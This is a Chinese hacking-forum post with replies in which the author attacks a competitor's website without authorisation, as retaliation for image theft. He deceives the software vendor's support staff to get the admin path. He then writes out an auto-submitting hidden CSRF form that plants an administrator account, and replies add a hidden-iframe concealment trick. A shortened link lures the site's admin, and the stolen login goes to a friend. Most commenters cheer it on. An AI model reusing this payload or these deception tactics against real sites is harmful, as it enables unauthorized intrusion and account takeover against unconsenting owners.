用户
搜索
  • TA的每日心情

    2017-12-26 09:11
  • 签到天数: 5 天

    连续签到: 1 天

    [LV.2]偶尔看看

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    13

    主题

    164

    帖子

    550

    魔法币
    收听
    0
    粉丝
    16
    注册时间
    2017-4-15

    i春秋签约作者

    发表于 2018-1-2 18:57:33 11010307
    最近我一个做贸易的朋友找到我,他发现自己拍摄的图片又被某个同行盗用了,而且是全站的图片基本都被盗用。
    之前对方是引用他的图片链接,后面我给他做了防盗链解决了,现在对方是先下载图片,然后自己上传到服务器。
    我朋友说和对方谈过几次,但是对方态度嚣张,让他有本事去就去告....


    那么闲来无事,咱们不如来一发?


    0x01 信息收集
    先随便浏览一些页面,发现网站是aspx的,然后扫描了下,windows服务器,iis搭建。
    通过指纹识别没查到相关cms,然后开始看JS和css等文件,没发现什么有价值的信息。

    前台可以注册会员,但是注册以后没有上传点,修改资料和留言处也不能插xss。
    2.jpg

    然后我发现在他的网站底部,有个【技术支持】,点击后跳转到一家软件公司。

    1.jpg

    0x02 套路 满满的套路
    进入软件公司网站后,在首页底部找到客服的QQ号,我添加上了以后开始要演示地址。

    3.jpg

    一般演示地址都会给后台地址的,我目的就是看后台有没有漏洞。


    4.jpg

    本来以为后台是admin的,试了下没进去,然后咱们继续套路客服。

    6.jpg

    得到后台以后开始找上传点尝试截断上传,最终尝试失败。
    翻了下其他的功能也没啥用,不过我发现在后台的管理员添加这里,貌似存在CSRF。
    那么咱们就来测试一下看看。

    5.jpg


    点击添加管理员


    7.jpg

    进入后我们输入用户名:haha 密码:123456 邮件地址随便输入一个。
    然后开启浏览器代理,打开burp对数据包进行拦截,然后点添加按钮。
    我们就抓到了一个添加管理员的POST请求。
    通过分析发现没有token验证。

    8.jpg


    然后我们点击右键,选择Engagement tools > Generate CSRF poc

    9.jpg

    点击以后会进入这里,我们copy html代码到本地,新建一个html文件,把代码复制进去。

    qq2.jpg

    然后把这个html文件上传到自己的网站空间(本地打开测试也是可以的),通过浏览器打开这个html文件的URL,点击按钮以后,发现跳转到了后台的首页,然后重新进入管理员列表发现已经多了一个haha的管理员账号,拥有全部权限。


    10.jpg

    0x03 空降一个管理员账号
    现在咱们就去套路这个盗用别人劳动成果的无耻之徒吧。
    不过在这之前,我们先改进一下这个html文件,要不然一个大大的按钮容易让人起疑心,而且我们要让数据自动提交,而不是要诱骗他去点击这个按钮。

    改进后的代码如下:

    [AppleScript] 纯文本查看 复制代码
    <html>
      <head>
    <script>
    
    function sub(){
    
    document.form1.submit();
    }
    setTimeout(sub,1);
    </script>
    </head>
      <body>
        <form name="form1" action="http://www.xxxx.com/admin/store/AddManager.aspx" method="POST">
          <input type="hidden" name="__VIEWSTATE" value="/wEPDwUKMTg4Mjk2---强行打码---wMEZ2dnZxYBZmRk" />
          <input type="hidden" name="ctl00$contentHolder$txtUserName" value="hack" />
          <input type="hidden" name="ctl00$contentHolder$txtPassword" value="123456" />
          <input type="hidden" name="ctl00$contentHolder$txtPasswordagain" value="123456" />
          <input type="hidden" name="ctl00$contentHolder$txtEmail" value="656566568@qq.com" />
          <input type="hidden" name="ctl00$contentHolder$dropRole" value="3c40faeb-马赛克-ad3c-5fb1afd018b6" />
          <input type="hidden" name="ctl00$contentHolder$btnCreate" value="æ·» åŠ " />
          <input type="submit" value="Submit request" style="display:none" />
        </form>
      </body>
    </html>


    这里感谢45楼的表哥提醒,用以下方法可以实现隐藏跳转。


    准备两个页面 ,一个放csrf的代码 1.html,另一个页面2.html 用iframe包含住1.html

    <iframe src="1.html" style="display:none"></iframe>然后把2.html生成url短链接,发给对方即可。

    现在我们把这个改进好的html文件上传到网站空间,然后重新访问一遍测试是否可用。
    测试完成以后把这个url放到http://www.alifeifei.net/缩短。
    点击生成以后,得到一个缩短的地址,目的就是为了好欺骗网站管理员。
    访问这个缩短的地址会自动跳转到我们的html文件。

    13.jpg

    现在登录这个抄袭者的网站前台,然后给管理员发送一个我们缩短的那个链接。
    这里是个野路子,为什么我不通过QQ直接发地址过去(原因是如果对方在打开你链接的时候没有登录后台,就不会触发CSRF)

    QQ截图1.jpg

    所以,我们选择在网站上给他留言,如果管理员看到这个留言,那么他肯定是在后台并且登录了的,所以只要他打开这个地址就会中招。

    等了一会儿我尝试用我们构造好的hack账号登陆,还是没登陆上。

    0x04 等不及了 继续套路
    现在回到这个盗图者的网站,在网站上找到他的QQ,然后添加。

    14.jpg

    15.jpg

    现在登录后台看看,账号:hack 密码:123456 成功进入

    借用盗图狗的手打了他自己一耳刮子( • ̀ω•́ )✧

    17.jpg
    18.jpg

    然后把这个账号密码发给我朋友,剩下的看他怎么弄啦….

    0x05 你懂的
    拉黑 删除自己网站空间的html文件。

    16.jpg

    0x06 分享一个CSRF的利用工具
    -------回复可见-------
    注意:需要安装java环境
    链接:https://pan.baidu.com/s/1dE9pH3j 密码:gam4



    本帖被以下淘专辑推荐:

    jasonx 发表于 2018-1-3 16:20
    我也想做啊,表哥,研究了好久还是不能隐藏跳转。

    准备两个页面 ,一个放csrf的代码 1.html,另一个页面2.html 用iframe包含住1.html,好像这样:
    [HTML] 纯文本查看 复制代码
    <iframe src="1.html" style="display:none"></iframe>

    用目标访问2.html就好了。
    使用道具 举报 回复
    发表于 2018-1-3 16:16:25
    本帖最后由 jasonx 于 2018-1-3 16:21 编辑
    琴心丶剑胆 发表于 2018-1-3 16:00
    感谢大佬的分享,过程懂了,就是不太明白CSRF的漏洞到底是什么意思?求大佬略微解释 ...

    可以看看FB上的这篇文章
    http://www.freebuf.com/articles/web/55965.html
    下面这篇也可以,讲述了具体原因。
    http://blog.csdn.net/stpeace/article/details/53512283
    使用道具 举报 回复
    发表于 2018-1-3 16:31:17
    本帖最后由 jasonx 于 2018-1-3 16:34 编辑
    icqcb4258d4 发表于 2018-1-3 16:25
    准备两个页面 ,一个放csrf的代码 1.html,另一个页面2.html 用iframe包含住1.html,好像这样:
    [mw_shl_ ...

    真·老司机
    的确可以隐藏跳转。感谢表哥的提醒,我已经写进文章里面了。
    使用道具 举报 回复
    Captain_X 发表于 2018-1-2 23:47
    感觉套路比技术还重要,哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈 ...

    社会工程学的攻击方式啊....人性的漏洞!佩服表哥
    使用道具 举报 回复
    感觉套路比技术还重要,哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈
    使用道具 举报 回复
    发表于 2018-1-3 16:20:08
    icqcb4258d4 发表于 2018-1-3 15:04
    CSRF那里不做一下后面的跳转页面隐藏吗?很容易被发现啊~这思路可以,学习了。 ...

    我也想做啊,表哥,研究了好久还是不能隐藏跳转。
    使用道具 举报 回复
    哈哈,正义之师啊
    使用道具 举报 回复
    发表于 2018-1-2 20:34:27
    这波操作骚气,不得不喊波666
    使用道具 举报 回复
    发表于 2018-1-2 22:13:29
    喊博666
    使用道具 举报 回复
    感谢楼主分享
    使用道具 举报 回复
    厉害了 word哥
    使用道具 举报 回复
    发表于 2018-1-2 23:33:10
    6666666666666666
    使用道具 举报 回复
    发表于 2018-1-3 02:08:05
    嘿嘿,这个可以有!!...
    使用道具 举报 回复
    发表于 2018-1-3 08:28:20
    “借刀杀人”之CSRF拿下盗图狗后台
    使用道具 举报 回复
    6666666666
    使用道具 举报 回复
    6666666666
    使用道具 举报 回复
    发表于 2018-1-3 09:29:52
    思路很6666
    使用道具 举报 回复
    发表于 2018-1-3 09:52:12
    66666666666666666666666666666
    使用道具 举报 回复
    11111111111111111
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册